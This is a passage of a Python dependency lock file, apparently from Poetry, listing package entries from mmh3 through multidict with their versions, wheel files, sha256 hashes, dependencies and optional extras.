"mmh3-3.1.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:524e29dfe66499695f9496edcfc96782d130aabd6ba12c50c72372163cc6f3ea"}, {file = "mmh3-3.1.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:66bdb06a03074e65e614da1aa199b1d16c90608bec9d8fc3faa81d887ffe93cc"}, {file = "mmh3-3.1.0-cp311-cp311-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2a4d471eb75df8320061ab3b8cbe11c970be9f116b01bc2222ebda9c0a777520"}, {file = "mmh3-3.1.0-cp311-cp311-win32.whl", hash = "sha256:a886d9ce995a4bdfd7a600ddf61b9015cccbc73c50b898f8ff3c78af24384710"}, {file = "mmh3-3.1.0-cp311-cp311-win_amd64.whl", hash = "sha256:5edb5ac882c04aff8a2a18ae8b74a0c339ac9b83db9820d8456f518bb558e0d8"}, {file = "mmh3-3.1.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:190fd10981fbd6c67e10ce3b56bcc021562c0df0fee2e2864347d64e65b1783a"}, {file = "mmh3-3.1.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:cd781b115cf649811cfde76368c33d2e553b6f88bb41131c314f30d8e65e9d24"}, {file = "mmh3-3.1.0-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:f48bb0a867077acc1f548591ad49506389f36d18f36dccd10becf071e5cbdda4"}, {file = "mmh3-3.1.0-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7d0936a82438e340636a11b9a938378870fc1c7a139632dac09a9a9277351704"}, {file = "mmh3-3.1.0-cp37-cp37m-win32.whl", hash = "sha256:d196cc035c2238493248522ae4e54c3cb790549b1564f6dea4d88dfe4b326313"}, {file = "mmh3-3.1.0-cp37-cp37m-win_amd64.whl", hash = "sha256:731d37f089b6c212fab1beea24e673161146eb6c76baf9ac074a3424d1172d41"}, {file = "mmh3-3.1.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:9977fb81f8c66f4eee8439734a18dba7826fe78723d15ab53f42db977005be0f"}, {file = "mmh3-3.1.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:bf4f3f20a8b8405c08b13bc9e4ac33bf55129b50b535cd07ce1891b7f96326ac"}, {file = "mmh3-3.1.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:87cdbc6e70099ad92f17a28b4054ffb1938657e8fb7c1e4e03b194a1b4683fd6"}, {file = "mmh3-3.1.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6dd81321d14f62aa3711f30533c85a74dc7596e0fee63c8eddd375bc92ab846c"}, {file = "mmh3-3.1.0-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2e6eba88e5c1a2778f3de00a9502e3c214ebb757337ece2a7d71e060d188ddfa"}, {file = "mmh3-3.1.0-cp38-cp38-win32.whl", hash = "sha256:d91e696925f208d28f3bb7bdf29815524ce955248276af256519bd3538c411ce"}, {file = "mmh3-3.1.0-cp38-cp38-win_amd64.whl", hash = "sha256:cbc2917df568aeb86ec5aa863bfb20fa14e01039cbdce7650efbabc30960df49"}, {file = "mmh3-3.1.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:3b22832d565128be83d69f5d49243bb567840a954df377c9f5b26646a6eec39b"}, {file = "mmh3-3.1.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:ced92a0e285a9111413541c197b0c17d280cee96f7c564b258caf5de5ab8ee01"}, {file = "mmh3-3.1.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f906833753b4ddcb690c2c1b74e77725868bc3a8b762b7a77737d08be89ae41d"}, {file = "mmh3-3.1.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:72b5685832a7a87a55ebff481794bc410484d7bd4c5e80dae4d8ac50739138ef"}, {file = "mmh3-3.1.0-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8d2aa4d422c7c088bbc5d367b45431268ebe6742a0a64eade93fab708e25757c"}, {file = "mmh3-3.1.0-cp39-cp39-win32.whl", hash = "sha256:4459bec818f534dc8378568ad89ab310ff47cda3e00ab322edce48dd899bba32"}, {file = "mmh3-3.1.0-cp39-cp39-win_amd64.whl", hash = "sha256:03e04b3480e71828f48d17653451a3286555f0534942cb6ba93065b10ad5f9dc"}, {file = "mmh3-3.1.0.tar.gz", hash = "sha256:9b0f2b2ab4a915333c9d1089572e290a021ebb5b900bb7f7114dccc03995d732"}, ] [[package]] name = "momento" version = "1.12.0" description = "SDK for Momento" optional = true python-versions = ">=3.7,<4.0" files = [ {file = "momento-1.12.0-py3-none-any.whl", hash = "sha256:1dcb3ebadba67bc5e49337c433119d3857ff2e1e36627a8fcdadcc5db9a2f785"}, {file = "momento-1.12.0.tar.gz", hash = "sha256:31918c4e56b8db2f632a465c3a7df656666b8dab9efdcd49c61f3451d7bc481d"}, ] [package.dependencies] grpcio = ">=1.46.0,<2.0.0" momento-wire-types = ">=0.86.0,<0.87.0" pyjwt = ">=2.4.0,<3.0.0" [[package]] name = "momento-wire-types" version = "0.86.0" description = "Momento Client Proto Generated Files" optional = true python-versions = ">=3.7,<4.0" files = [ {file = "momento_wire_types-0.86.0-py3-none-any.whl", hash = "sha256:1079f61f3a0aa90865870b116a8699289e6f03b969a349265abdd605b073251c"}, {file = "momento_wire_types-0.86.0.tar.gz", hash = "sha256:7695a448382fbfda8ad7a51c307b34a2ef3d81d883f77b71891c27a4c25aed18"}, ] [package.dependencies] grpcio = "*" protobuf = ">=3,<5" [[package]] name = "more-itertools" version = "10.1.0" description = "More routines for operating on iterables, beyond itertools" optional = true python-versions = ">=3.8" files = [ {file = "more-itertools-10.1.0.tar.gz", hash = "sha256:626c369fa0eb37bac0291bce8259b332fd59ac792fa5497b59837309cd5b114a"}, {file = "more_itertools-10.1.0-py3-none-any.whl", hash = "sha256:64e0735fcfdc6f3464ea133afe8ea4483b1c5fe3a3d69852e6503b43a0b222e6"}, ] [[package]] name = "motor" version = "3.3.1" description = "Non-blocking MongoDB driver for Tornado or asyncio" optional = true python-versions = ">=3.7" files = [ {file = "motor-3.3.1-py3-none-any.whl", hash = "sha256:a0dee83ad0d47b353932ac37467ba397b1e649ce7e3eea7f5a90554883d7cdbe"}, {file = "motor-3.3.1.tar.gz", hash = "sha256:c5eb400e27d722a3db03a9826656b6d13acf9b6c70c2fb4604f474eac9da5be4"}, ] [package.dependencies] pymongo = ">=4.5,<5" [package.extras] aws = ["pymongo[aws] (>=4.5,<5)"] encryption = ["pymongo[encryption] (>=4.5,<5)"] gssapi = ["pymongo[gssapi] (>=4.5,<5)"] ocsp = ["pymongo[ocsp] (>=4.5,<5)"] snappy = ["pymongo[snappy] (>=4.5,<5)"] srv = ["pymongo[srv] (>=4.5,<5)"] test = ["aiohttp", "mockupdb", "motor[encryption]", "pytest (>=7)", "tornado (>=5)"] zstd = ["pymongo[zstd] (>=4.5,<5)"] [[package]] name = "mpmath" version = "1.3.0" description = "Python library for arbitrary-precision floating-point arithmetic" optional = true python-versions = "*" files = [ {file = "mpmath-1.3.0-py3-none-any.whl", hash = "sha256:a0b2b9fe80bbcd81a6647ff13108738cfb482d481d826cc0e02f5b35e5c88d2c"}, {file = "mpmath-1.3.0.tar.gz", hash = "sha256:7a28eb2a9774d00c7bc92411c19a89209d5da7c4c9a9e227be8330a23a25b91f"}, ] [package.extras] develop = ["codecov", "pycodestyle", "pytest (>=4.6)", "pytest-cov", "wheel"] docs = ["sphinx"] gmpy = ["gmpy2 (>=2.1.0a4)"] tests = ["pytest (>=4.6)"] [[package]] name = "msal" version = "1.24.1" description = "The Microsoft Authentication Library (MSAL) for Python library" optional = true python-versions = ">=2.7" files = [ {file = "msal-1.24.1-py2.py3-none-any.whl", hash = "sha256:ce4320688f95c301ee74a4d0e9dbcfe029a63663a8cc61756f40d0d0d36574ad"}, {file = "msal-1.24.1.tar.gz", hash = "sha256:aa0972884b3c6fdec53d9a0bd15c12e5bd7b71ac1b66d746f54d128709f3f8f8"}, ] [package.dependencies] cryptography = ">=0.6,<44" PyJWT = {version = ">=1.0.0,<3", extras = ["crypto"]} requests = ">=2.0.0,<3" [package.extras] broker = ["pymsalruntime (>=0.13.2,<0.14)"] [[package]] name = "msal-extensions" version = "1.0.0" description = "Microsoft Authentication Library extensions (MSAL EX) provides a persistence API that can save your data on disk, encrypted on Windows, macOS and Linux. Concurrent data access will be coordinated by a file lock mechanism." optional = true python-versions = "*" files = [ {file = "msal-extensions-1.0.0.tar.gz", hash = "sha256:c676aba56b0cce3783de1b5c5ecfe828db998167875126ca4b47dc6436451354"}, {file = "msal_extensions-1.0.0-py2.py3-none-any.whl", hash = "sha256:91e3db9620b822d0ed2b4d1850056a0f133cba04455e62f11612e40f5502f2ee"}, ] [package.dependencies] msal = ">=0.4.1,<2.0.0" portalocker = [ {version = ">=1.0,<3", markers = "python_version >= \"3.5\" and platform_system != \"Windows\""}, {version = ">=1.6,<3", markers = "python_version >= \"3.5\" and platform_system == \"Windows\""}, ] [[package]] name = "msgpack" version = "1.0.7" description = "MessagePack serializer" optional = true python-versions = ">=3.8" files = [ {file = "msgpack-1.0.7-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:04ad6069c86e531682f9e1e71b71c1c3937d6014a7c3e9edd2aa81ad58842862"}, {file = "msgpack-1.0.7-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:cca1b62fe70d761a282496b96a5e51c44c213e410a964bdffe0928e611368329"}, {file = "msgpack-1.0.7-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:e50ebce52f41370707f1e21a59514e3375e3edd6e1832f5e5235237db933c98b"}, {file = "msgpack-1.0.7-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4a7b4f35de6a304b5533c238bee86b670b75b03d31b7797929caa7a624b5dda6"}, {file = "msgpack-1.0.7-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:28efb066cde83c479dfe5a48141a53bc7e5f13f785b92ddde336c716663039ee"}, {file = "msgpack-1.0.7-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:4cb14ce54d9b857be9591ac364cb08dc2d6a5c4318c1182cb1d02274029d590d"}, {file = "msgpack-1.0.7-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:b573a43ef7c368ba4ea06050a957c2a7550f729c31f11dd616d2ac4aba99888d"}, {file = "msgpack-1.0.7-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:ccf9a39706b604d884d2cb1e27fe973bc55f2890c52f38df742bc1d79ab9f5e1"}, {file = "msgpack-1.0.7-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:cb70766519500281815dfd7a87d3a178acf7ce95390544b8c90587d76b227681"}, {file = "msgpack-1.0.7-cp310-cp310-win32.whl", hash = "sha256:b610ff0f24e9f11c9ae653c67ff8cc03c075131401b3e5ef4b82570d1728f8a9"}, {file = "msgpack-1.0.7-cp310-cp310-win_amd64.whl", hash = "sha256:a40821a89dc373d6427e2b44b572efc36a2778d3f543299e2f24eb1a5de65415"}, {file = "msgpack-1.0.7-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:576eb384292b139821c41995523654ad82d1916da6a60cff129c715a6223ea84"}, {file = "msgpack-1.0.7-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:730076207cb816138cf1af7f7237b208340a2c5e749707457d70705715c93b93"}, {file = "msgpack-1.0.7-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:85765fdf4b27eb5086f05ac0491090fc76f4f2b28e09d9350c31aac25a5aaff8"}, {file = "msgpack-1.0.7-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3476fae43db72bd11f29a5147ae2f3cb22e2f1a91d575ef130d2bf49afd21c46"}, {file = "msgpack-1.0.7-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6d4c80667de2e36970ebf74f42d1088cc9ee7ef5f4e8c35eee1b40eafd33ca5b"}, {file = "msgpack-1.0.7-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:5b0bf0effb196ed76b7ad883848143427a73c355ae8e569fa538365064188b8e"}, {file = "msgpack-1.0.7-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:f9a7c509542db4eceed3dcf21ee5267ab565a83555c9b88a8109dcecc4709002"}, {file = "msgpack-1.0.7-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:84b0daf226913133f899ea9b30618722d45feffa67e4fe867b0b5ae83a34060c"}, {file = "msgpack-1.0.7-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:ec79ff6159dffcc30853b2ad612ed572af86c92b5168aa3fc01a67b0fa40665e"}, {file = "msgpack-1.0.7-cp311-cp311-win32.whl", hash = "sha256:3e7bf4442b310ff154b7bb9d81eb2c016b7d597e364f97d72b1acc3817a0fdc1"}, {file = "msgpack-1.0.7-cp311-cp311-win_amd64.whl", hash = "sha256:3f0c8c6dfa6605ab8ff0611995ee30d4f9fcff89966cf562733b4008a3d60d82"}, {file = "msgpack-1.0.7-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:f0936e08e0003f66bfd97e74ee530427707297b0d0361247e9b4f59ab78ddc8b"}, {file = "msgpack-1.0.7-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:98bbd754a422a0b123c66a4c341de0474cad4a5c10c164ceed6ea090f3563db4"}, {file = "msgpack-1.0.7-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:b291f0ee7961a597cbbcc77709374087fa2a9afe7bdb6a40dbbd9b127e79afee"}, {file = "msgpack-1.0.7-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ebbbba226f0a108a7366bf4b59bf0f30a12fd5e75100c630267d94d7f0ad20e5"}, {file = "msgpack-1.0.7-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1e2d69948e4132813b8d1131f29f9101bc2c915f26089a6d632001a5c1349672"}, {file = "msgpack-1.0.7-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:bdf38ba2d393c7911ae989c3bbba510ebbcdf4ecbdbfec36272abe350c454075"}, {file = "msgpack-1.0.7-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:993584fc821c58d5993521bfdcd31a4adf025c7d745bbd4d12ccfecf695af5ba"}, {file = "msgpack-1.0.7-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:52700dc63a4676669b341ba33520f4d6e43d3ca58d422e22ba66d1736b0a6e4c"}, {file = "msgpack-1.0.7-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:e45ae4927759289c30ccba8d9fdce62bb414977ba158286b5ddaf8df2cddb5c5"}, {file = "msgpack-1.0.7-cp312-cp312-win32.whl", hash = "sha256:27dcd6f46a21c18fa5e5deed92a43d4554e3df8d8ca5a47bf0615d6a5f39dbc9"}, {file = "msgpack-1.0.7-cp312-cp312-win_amd64.whl", hash = "sha256:7687e22a31e976a0e7fc99c2f4d11ca45eff652a81eb8c8085e9609298916dcf"}, {file = "msgpack-1.0.7-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:5b6ccc0c85916998d788b295765ea0e9cb9aac7e4a8ed71d12e7d8ac31c23c95"}, {file = "msgpack-1.0.7-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:235a31ec7db685f5c82233bddf9858748b89b8119bf4538d514536c485c15fe0"}, {file = "msgpack-1.0.7-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:cab3db8bab4b7e635c1c97270d7a4b2a90c070b33cbc00c99ef3f9be03d3e1f7"}, {file = "msgpack-1.0.7-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:0bfdd914e55e0d2c9e1526de210f6fe8ffe9705f2b1dfcc4aecc92a4cb4b533d"}, {file = "msgpack-1.0.7-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:36e17c4592231a7dbd2ed09027823ab295d2791b3b1efb2aee874b10548b7524"}, {file = "msgpack-1.0.7-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:38949d30b11ae5f95c3c91917ee7a6b239f5ec276f271f28638dec9156f82cfc"}, {file = "msgpack-1.0.7-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:ff1d0899f104f3921d94579a5638847f783c9b04f2d5f229392ca77fba5b82fc"}, {file = "msgpack-1.0.7-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:dc43f1ec66eb8440567186ae2f8c447d91e0372d793dfe8c222aec857b81a8cf"}, {file = "msgpack-1.0.7-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:dd632777ff3beaaf629f1ab4396caf7ba0bdd075d948a69460d13d44357aca4c"}, {file = "msgpack-1.0.7-cp38-cp38-win32.whl", hash = "sha256:4e71bc4416de195d6e9b4ee93ad3f2f6b2ce11d042b4d7a7ee00bbe0358bd0c2"}, {file = "msgpack-1.0.7-cp38-cp38-win_amd64.whl", hash = "sha256:8f5b234f567cf76ee489502ceb7165c2a5cecec081db2b37e35332b537f8157c"}, {file = "msgpack-1.0.7-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:bfef2bb6ef068827bbd021017a107194956918ab43ce4d6dc945ffa13efbc25f"}, {file = "msgpack-1.0.7-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:484ae3240666ad34cfa31eea7b8c6cd2f1fdaae21d73ce2974211df099a95d81"}, {file = "msgpack-1.0.7-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:3967e4ad1aa9da62fd53e346ed17d7b2e922cba5ab93bdd46febcac39be636fc"}, {file = "msgpack-1.0.7-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8dd178c4c80706546702c59529ffc005681bd6dc2ea234c450661b205445a34d"}, {file = "msgpack-1.0.7-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f6ffbc252eb0d229aeb2f9ad051200668fc3a9aaa8994e49f0cb2ffe2b7867e7"}, {file = "msgpack-1.0.7-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:822ea70dc4018c7e6223f13affd1c5c30c0f5c12ac1f96cd8e9949acddb48a61"}, {file = "msgpack-1.0.7-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:384d779f0d6f1b110eae74cb0659d9aa6ff35aaf547b3955abf2ab4c901c4819"}, {file = "msgpack-1.0.7-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:f64e376cd20d3f030190e8c32e1c64582eba56ac6dc7d5b0b49a9d44021b52fd"}, {file = "msgpack-1.0.7-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:5ed82f5a7af3697b1c4786053736f24a0efd0a1b8a130d4c7bfee4b9ded0f08f"}, {file = "msgpack-1.0.7-cp39-cp39-win32.whl", hash = "sha256:f26a07a6e877c76a88e3cecac8531908d980d3d5067ff69213653649ec0f60ad"}, {file = "msgpack-1.0.7-cp39-cp39-win_amd64.whl", hash = "sha256:1dc93e8e4653bdb5910aed79f11e165c85732067614f180f70534f056da97db3"}, {file = "msgpack-1.0.7.tar.gz", hash = "sha256:572efc93db7a4d27e404501975ca6d2d9775705c2d922390d878fcf768d92c87"}, ] [[package]] name = "msrest" version = "0.7.1" description = "AutoRest swagger generator Python client runtime." optional = true python-versions = ">=3.6" files = [ {file = "msrest-0.7.1-py3-none-any.whl", hash = "sha256:21120a810e1233e5e6cc7fe40b474eeb4ec6f757a15d7cf86702c369f9567c32"}, {file = "msrest-0.7.1.zip", hash = "sha256:6e7661f46f3afd88b75667b7187a92829924446c7ea1d169be8c4bb7eeb788b9"}, ] [package.dependencies] azure-core = ">=1.24.0" certifi = ">=2017.4.17" isodate = ">=0.6.0" requests = ">=2.16,<3.0" requests-oauthlib = ">=0.5.0" [package.extras] async = ["aiodns", "aiohttp (>=3.0)"] [[package]] name = "multidict" version = "6.0.4" description = "multidict implementation" optional = false python-versions = ">=3.7" files = [ {file = "multidict-6.0.4-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:0b1a97283e0c85772d613878028fec909f003993e1007eafa715b24b377cb9b8"}, {file = "multidict-6.0.4-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:eeb6dcc05e911516ae3d1f207d4b0520d07f54484c49dfc294d6e7d63b734171"}, {file = "multidict-6.0.4-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:d6d635d5209b82a3492508cf5b365f3446afb65ae7ebd755e70e18f287b0adf7"}, {file = "multidict-6.0.4-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c048099e4c9e9d615545e2001d3d8a4380bd403e1a0578734e0d31703d1b0c0b"}, {file = "multidict-6.0.4-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:ea20853c6dbbb53ed34cb4d080382169b6f4554d394015f1bef35e881bf83547"}, {file = "multidict-6.0.4-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:16d232d4e5396c2efbbf4f6d4df89bfa905eb0d4dc5b3549d872ab898451f569"}, {file = "multidict-6.0.4-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:36c63aaa167f6c6b04ef2c85704e93af16c11d20de1d133e39de6a0e84582a93"}, {file = "multidict-6.0.4-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:64bdf1086b6043bf519869678f5f2757f473dee970d7abf6da91ec00acb9cb98"}, {file = "multidict-6.0.4-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:43644e38f42e3af682690876cff722d301ac585c5b9e1eacc013b7a3f7b696a0"}, {file = "multidict-6.0.4-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:7582a1d1030e15422262de9f58711774e02fa80df0d1578995c76214f6954988"}, {file = "multidict-6.0.4-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:ddff9c4e225a63a5afab9dd15590432c22e8057e1a9a13d28ed128ecf047bbdc"}, {file = "multidict-6.0.4-cp310-cp310-musllinux_1_1_s390x.whl", hash = "sha256:ee2a1ece51b9b9e7752e742cfb661d2a29e7bcdba2d27e66e28a99f1890e4fa0"}, {file = "multidict-6.0.4-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:a2e4369eb3d47d2034032a26c7a80fcb21a2cb22e1173d761a162f11e562caa5"}, {file = "multidict-6.0.4-cp310-cp310-win32.whl", hash = "sha256:574b7eae1ab267e5f8285f0fe881f17efe4b98c39a40858247720935b893bba8"}, {file = "multidict-6.0.4-cp310-cp310-win_amd64.whl", hash = "sha256:4dcbb0906e38440fa3e325df2359ac6cb043df8e58c965bb45f4e406ecb162cc"}, {file = "multidict-6.0.4-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:0dfad7a5a1e39c53ed00d2dd0c2e36aed4650936dc18fd9a1826a5ae1cad6f03"}, {file = "multidict-6.0.4-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:64da238a09d6039e3bd39bb3aee9c21a5e34f28bfa5aa22518581f910ff94af3"}, {file = "multidict-6.0.4-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:ff959bee35038c4624250473988b24f846cbeb2c6639de3602c073f10410ceba"}, {file = "multidict-6.0.4-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:01a3a55bd90018c9c080fbb0b9f4891db37d148a0a18722b42f94694f8b6d4c9"}, {file = "multidict-6.0.4-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:c5cb09abb18c1ea940fb99360ea0396f34d46566f157122c92dfa069d3e0e982"}, {file = "multidict-6.0.4-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:666daae833559deb2d609afa4490b85830ab0dfca811a98b70a205621a6109fe"}, {file = "multidict-6.0.4-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:11bdf3f5e1518b24530b8241529d2050014c884cf18b6fc69c0c2b30ca248710"}, {file = "multidict-6.0.4-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7d18748f2d30f94f498e852c67d61261c643b349b9d2a581131725595c45ec6c"}, {file = "multidict-6.0.4-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:458f37be2d9e4c95e2d8866a851663cbc76e865b78395090786f6cd9b3bbf4f4"}, {file = "multidict-6.0.4-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:b1a2eeedcead3a41694130495593a559a668f382eee0727352b9a41e1c45759a"}, {file = "multidict-6.0.4-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:7d6ae9d593ef8641544d6263c7fa6408cc90370c8cb2bbb65f8d43e5b0351d9c"}, {file = "multidict-6.0.4-cp311-cp311-musllinux_1_1_s390x.whl", hash = "sha256:5979b5632c3e3534e42ca6ff856bb24b2e3071b37861c2c727ce220d80eee9ed"}, {file = "multidict-6.0.4-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:dcfe792765fab89c365123c81046ad4103fcabbc4f56d1c1997e6715e8015461"}, {file = "multidict-6.0.4-cp311-cp311-win32.whl", hash = "sha256:3601a3cece3819534b11d4efc1eb76047488fddd0c85a3948099d5da4d504636"}, {file = "multidict-6.0.4-cp311-cp311-win_amd64.whl", hash = "sha256:81a4f0b34bd92df3da93315c6a59034df95866014ac08535fc819f043bfd51f0"}, {file = "multidict-6.0.4-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:67040058f37a2a51ed8ea8f6b0e6ee5bd78ca67f169ce6122f3e2ec80dfe9b78"}, {file = "multidict-6.0.4-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:853888594621e6604c978ce2a0444a1e6e70c8d253ab65ba11657659dcc9100f"}, {file = "multidict-6.0.4-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:39ff62e7d0f26c248b15e364517a72932a611a9b75f35b45be078d81bdb86603"}, {file = "multidict-6.0.4-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:af048912e045a2dc732847d33821a9d84ba553f5c5f028adbd364dd4765092ac"}, {file = "multidict-6.0.4-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b1e8b901e607795ec06c9e42530788c45ac21ef3aaa11dbd0c69de543bfb79a9"}, {file = "multidict-6.0.4-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:62501642008a8b9871ddfccbf83e4222cf8ac0d5aeedf73da36153ef2ec222d2"}, {file = "multidict-6.0.4-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:99b76c052e9f1bc0721f7541e5e8c05db3941eb9ebe7b8553c625ef88d6eefde"}, {file = "multidict-6.0.4-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:509eac6cf09c794aa27bcacfd4d62c885cce62bef7b2c3e8b2e49d365b5003fe"}, {file = "multidict-6.0.4-cp37-cp37m-musllinux_1_1_ppc64le.whl", hash = "sha256:21a12c4eb6ddc9952c415f24eef97e3e55ba3af61f67c7bc388dcdec1404a067"}, {file = "multidict-6.0.4-cp37-cp37m-musllinux_1_1_s390x.whl", hash = "sha256:5cad9430ab3e2e4fa4a2ef4450f548768400a2ac635841bc2a56a2052cdbeb87"}, {file = "multidict-6.0.4-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:ab55edc2e84460694295f401215f4a58597f8f7c9466faec545093045476327d"}, {file = "multidict-6.0.4-cp37-cp37m-win32.whl", hash = "sha256:5a4dcf02b908c3b8b17a45fb0f15b695bf117a67b76b7ad18b73cf8e92608775"}, {file = "multidict-6.0.4-cp37-cp37m-win_amd64.whl", hash = "sha256:6ed5f161328b7df384d71b07317f4d8656434e34591f20552c7bcef27b0ab88e"}, {file = "multidict-6.0.4-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:5fc1b16f586f049820c5c5b17bb4ee7583092fa0d1c4e28b5239181ff9532e0c"}, {file = "multidict-6.0.4-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:1502e24330eb681bdaa3eb70d6358e818e8e8f908a22a1851dfd4e15bc2f8161"}, {file = 